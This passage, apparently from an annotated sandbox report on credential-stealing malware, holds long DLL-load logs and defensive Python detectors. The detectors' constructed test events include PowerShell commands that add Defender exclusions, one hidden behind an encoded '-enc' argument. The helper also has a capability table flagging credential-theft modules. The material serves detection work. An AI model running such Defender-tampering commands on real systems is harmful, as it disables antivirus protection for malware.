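    parts = {x.lower() for x in p.parts}
    if {"appdata", "roaming"} <= parts:
        findings.append("appdata_roaming_exec")
        if p.parent.name.lower() == p.stem.lower():
            findings.append("self_named_persistence_dir")
    return findings


# Constructed events mirroring the report's process tree.
DESKTOP = r"C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PERSIST = r"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
ENC = base64.b64encode("Add-MpPreference -ExclusionPath C:\\Users\\Public".encode("utf-16-le")).decode()

EVENTS = [
    {"ParentImage": DESKTOP, "Image": PS,
     "CommandLine": f'"{PS}" Add-MpPreference -ExclusionPath "{DESKTOP}"'},
    {"ParentImage": DESKTOP, "Image": DESKTOP, "CommandLine": f'"{DESKTOP}"'},
    {"ParentImage": PERSIST, "Image": PERSIST, "CommandLine": f'"{PERSIST}"'},
    # Same tamper hidden behind -enc, the variant the cited Sigma rule targets.
    {"ParentImage": DESKTOP, "Image": PS, "CommandLine": f"{PS} -nop -w hidden -enc {ENC}"},
    # Benign control: explorer launching a program from Program Files.
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Program Files\Git\git-bash.exe",
     "CommandLine": "git-bash.exe"},
]


def run(events=EVENTS) -> Dict[int, List[str]]:
    """Map event index -> findings, for events that triggered anything."""
    out = {}
    for i, e in enumerate(events):
        f = analyze(e)
        if f:
            out[i] = f
    return out


if __name__ == "__main__":
    for i, f in run().items():
        print(i, EVENTS[i]["Image"], f)
```

The self-spawn check is deliberately blunt: legitimate software also relaunches itself (updaters, elevation prompts), so in production it is a scoring input rather than an alert on its own, while the exclusion tamper and the self-named AppData\Roaming folder are each strong enough to page on. Note that Add-MpPreference needs local administrator rights to take effect; the exclusion row in the report therefore also tells you the sandbox user was elevated.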
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: msv1_0.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: ntlmshared.dll
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Section loaded: cryptdll.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: edputil.dll
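The "Section loaded" rows above read as a flat list, but the modules a process pulls in are a cheap capability fingerprint: vaultcli.dll is the Windows Credential Manager client, wbemcomn.dll the WMI client used for the Win32_NetworkAdapter and AV-product queries, msv1_0.dll, ntlmshared.dll and sspicli.dll the NTLM/SSPI authentication stack, and amsi.dll is what .NET Framework 4.8 and later loads to scan an assembly loaded from memory. The triage helper below is an added example, not part of the Joe Sandbox report or its tooling: it parses rows in the format shown above (with or without the "Jump to behavior" link text), de-duplicates per process, maps DLLs to capabilities through a table that is this example's own assumption, and flags a process that runs from a user-writable path with a stealer-like module set. The sample rows are constructed from entries in the report; "sample.exe" stands in for the long original file name.

```python
"""Added example (not part of the Joe Sandbox report): turn a 'Section loaded'
list into a per-process capability summary.

Assumptions: CAPABILITIES is this example's own mapping of well-known Windows
DLLs to what they are typically used for; the thresholds in triage() are
illustrative; SAMPLE_LOG is constructed from rows in the report above.
"""
import re

# Matches the report's row format with or without the " | " separator and the
# trailing "Jump to behavior" link text.
LINE_RE = re.compile(
    r"Source:\s*(?P<proc>.+?\.exe)\s*\|?\s*Section loaded:\s*(?P<dll>[\w.\-]+\.dll)",
    re.IGNORECASE,
)

# Assumed mapping (this example's own): capability -> DLLs that usually indicate it.
CAPABILITIES = {
    "managed_clr_host":    {"mscoree.dll"},                        # process runs .NET code
    "amsi_scan":           {"amsi.dll"},                           # CLR scanning an in-memory assembly load
    "credential_vault":    {"vaultcli.dll"},                       # Windows Credential Manager client
    "ntlm_sspi_auth":      {"secur32.dll", "sspicli.dll", "msv1_0.dll", "ntlmshared.dll"},
    "wmi_client":          {"wbemcomn.dll"},                       # WMI queries (AV products, adapters)
    "adapter_enumeration": {"iphlpapi.dll", "dnsapi.dll", "dhcpcsvc.dll", "dhcpcsvc6.dll", "winnsi.dll"},
    "winsock":             {"mswsock.dll", "fwpuclnt.dll", "rasadhlp.dll"},
    "cryptoapi_csp":       {"cryptsp.dll", "rsaenh.dll", "cryptbase.dll"},  # RSA/AES CSP, DPAPI helpers
    "image_encoding":      {"windowscodecs.dll"},                  # screenshot encoding via WIC
}
STEALER_COMBO = {"credential_vault", "ntlm_sspi_auth", "wmi_client", "winsock"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")

# Constructed sample rows (subset of the report), deliberately in both row styles.
SAMPLE_LOG = r"""
Source: C:\Users\user\Desktop\sample.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\sample.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\sample.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\sample.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\sample.exe | Section loaded: msv1_0.dll
Source: C:\Users\user\Desktop\sample.exe | Section loaded: ntlmshared.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vaultcli.dllJump to behavior
"""


def parse_loaded(log: str) -> dict:
    """Return {process_path: [dll, ...]} with load order kept and duplicates dropped."""
    per_proc = {}
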